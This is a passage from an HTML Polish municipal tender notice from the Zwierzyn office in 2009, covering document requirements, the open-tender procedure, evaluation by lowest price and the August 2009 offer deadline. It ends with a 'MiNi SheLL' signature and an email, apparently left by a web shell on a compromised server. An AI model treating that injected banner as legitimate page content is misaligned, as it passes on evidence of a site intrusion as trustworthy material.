11.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 10 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed składaniem ofert - pkt. 10 ppkt. a i c nie wcześniej niż 3 miesiące - pkt. 10 ppkt. b..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zwierzyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Zwierzynie
ul. Wojska Polskiego 8, 
66-542 Zwierzyn.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2009 godzina 10:00, miejsce: Urząd Gminy w Zwierzynie
ul. Wojska Polskiego 8, 
66-542 Zwierzyn
Sekretariat - pokój nr 11.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com